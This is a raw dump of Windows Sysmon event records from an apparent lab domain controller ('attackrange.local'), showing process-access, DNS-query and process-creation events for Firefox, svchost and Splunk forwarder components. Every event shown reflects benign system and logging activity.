10341000x800000000000000018983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:57.614{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:59.645{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000018985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:59.645{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a4141|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:00.567{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:00.567{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:06.535{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:17.379{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:17.379{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:17.379{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:21.332{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd7ca7|C:\Program Files\Mozilla Firefox\xul.dll+a853c6|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program 
Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:21.332{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd7ca7|C:\Program Files\Mozilla Firefox\xul.dll+a853c6|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:24.800{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000019000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:26.831{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net099.84.90.17;99.84.90.69;99.84.90.119;99.84.90.128;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:26.831{59A5CD1D-945A-6005-3305-00000000A301}7052content-signature-2.cdn.mozilla.net0type: 5 d2nxq2uap88usk.cloudfront.net;::ffff:99.84.90.128;::ffff:99.84.90.17;::ffff:99.84.90.69;::ffff:99.84.90.119;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:26.643{59A5CD1D-945A-6005-3305-00000000A301}7052normandy-cdn.services.mozilla.com099.84.90.91;99.84.90.106;99.84.90.28;99.84.90.78;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:26.642{59A5CD1D-945A-6005-3305-00000000A301}7052normandy.cdn.mozilla.net0type: 5 normandy-cdn.services.mozilla.com;::ffff:99.84.90.78;::ffff:99.84.90.91;::ffff:99.84.90.106;::ffff:99.84.90.28;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:28.253{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla 
Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000019002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:28.020{59A5CD1D-8E56-6005-2E00-00000000A301}246478.90.84.99.in-addr.arpa.0type: 12 server-99-84-90-78.muc50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000019001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:26.837{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net02600:9000:2057:ae00:a:da5e:7900:93a1;2600:9000:2057:c000:a:da5e:7900:93a1;2600:9000:2057:2a00:a:da5e:7900:93a1;2600:9000:2057:6200:a:da5e:7900:93a1;2600:9000:2057:8000:a:da5e:7900:93a1;2600:9000:2057:8600:a:da5e:7900:93a1;2600:9000:2057:8c00:a:da5e:7900:93a1;2600:9000:2057:9800:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000019010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:44.565{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95F4-6005-6C05-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:44.565{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:44.565{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:44.565{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:44.565{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:44.565{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-95F4-6005-6C05-00000000A301}4876C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:44.565{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95F4-6005-6C05-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:44.566{59A5CD1D-95F4-6005-6C05-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.550{59A5CD1D-95F5-6005-6D05-00000000A301}42406928C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.397{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95F5-6005-6D05-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:06:45.395{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:06:45.395{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
